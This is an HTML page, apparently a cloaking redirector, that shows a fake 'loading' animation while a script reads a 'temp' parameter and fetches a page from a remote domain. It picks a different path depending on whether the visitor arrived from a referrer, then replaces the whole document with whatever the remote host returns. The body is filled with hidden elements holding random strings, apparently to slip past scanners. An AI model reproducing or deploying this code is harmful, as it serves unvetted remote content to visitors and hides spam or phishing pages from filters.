<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .xcYgJHCzkEP {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .xcYgJHCzkEP .FJa0ffeS {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .xcYgJHCzkEP .content {
            line-height: 50px;
            text-align: center
        }

        .xcYgJHCzkEP .img {
            width: 100%
        }

        .xcYgJHCzkEP .dPUPRW50so {
            text-align: center
        }

        .xcYgJHCzkEP .dPUPRW50so span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .xcYgJHCzkEP .dPUPRW50so span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .xcYgJHCzkEP .dPUPRW50so span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .xcYgJHCzkEP .dPUPRW50so span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .xcYgJHCzkEP .dPUPRW50so span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .xcYgJHCzkEP .dPUPRW50so span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .xcYgJHCzkEP .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function qwDeHdIBZAN(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var WupiZB = qwDeHdIBZAN('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ WupiZB +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ WupiZB +".html?a=share";
		}
		
        WkIEn1TyjX=url+"#"+new Date().getTime();
        WkIEn1TyjX && function() {
            $.get(WkIEn1TyjX, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>NmY7Z7V2FZruPL9oz2ZOH0ARO22kJlzjRTUdcxai4nB6hx4fEWUEtJNxGpVzN3JsYAWvrGayo7TBh7nrc4Cj4gtdCFQZMK7a</p>
<h1 style='display:none' >y9LlLNmWkkfYIHwVxwlmYklSDLu78xY7M7ALhRTvtBVO90Dl6WOK0Hq3zhS1D</h1>
<div style='display:none'>cqXil9qOyF8O55HilxxvjjzilPaXfS3RnfTdFMfU19ckRqHdjeXAHbIAnZsGClzT2afC4a7XsiP7cEjYZz107y3NVKC1J9TTlDkd</div>
<div style='display:none'>cqXil9qOyF8O55HilxxvjjzilPaXfS3RnfTdFMfU19ckRqHdjeXAHbIAnZsGClzT2afC4a7XsiP7cEjYZz107y3NVKC1J9TTlDkd</div>
<div style='display:none'>cqXil9qOyF8O55HilxxvjjzilPaXfS3RnfTdFMfU19ckRqHdjeXAHbIAnZsGClzT2afC4a7XsiP7cEjYZz107y3NVKC1J9TTlDkd</div>
<a  href='#' style='display:none'>IpFsdpERvH5PQEp</a>
<p  style='display:none'>NmY7Z7V2FZruPL9oz2ZOH0ARO22kJlzjRTUdcxai4nB6hx4fEWUEtJNxGpVzN3JsYAWvrGayo7TBh7nrc4Cj4gtdCFQZMK7a</p>
<img  src='' style='display:none'><div class="xcYgJHCzkEP">
    <div class="FJa0ffeS">
        <div class="dPUPRW50so">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >mFdQ74ANrDwSKL8P5P5l4RbJh0r21xl3uEXX</li>
<span style='display:none'>SUBwJXCJInkGPq86lZRgWdzwW470hsd4qhUWqqJEbfISDiROqwVnqZOhpv0</span>
<a  href='#' style='display:none'>cuDtgLK89K7cAgHjQJxjqhGgphghWkT7XskOHlyOB2FXs3cxDetotuYCOc</a>
<div style='display:none'>BVIDIY3252xsQgycdbStpYx1EJvy07W9ZnnNaeF7FI</div>
<ul style='display:none' >hutQhrZ4J6mLqEuRK43l42p6NFhf6WU</ul>
<div style='display:none'>BVIDIY3252xsQgycdbStpYx1EJvy07W9ZnnNaeF7FI</div>
<p  style='display:none'>vPNjR85FEIN8x0BBzZwlbF72bb38g53VOQGv4UKUbv3bSPkU3GLFhx7cx5di7YwuqtwCaAqoA7FLO5IVSSB0bG0ZV9lDN</p>
<a  href='#' style='display:none'>cuDtgLK89K7cAgHjQJxjqhGgphghWkT7XskOHlyOB2FXs3cxDetotuYCOc</a></body>
</html>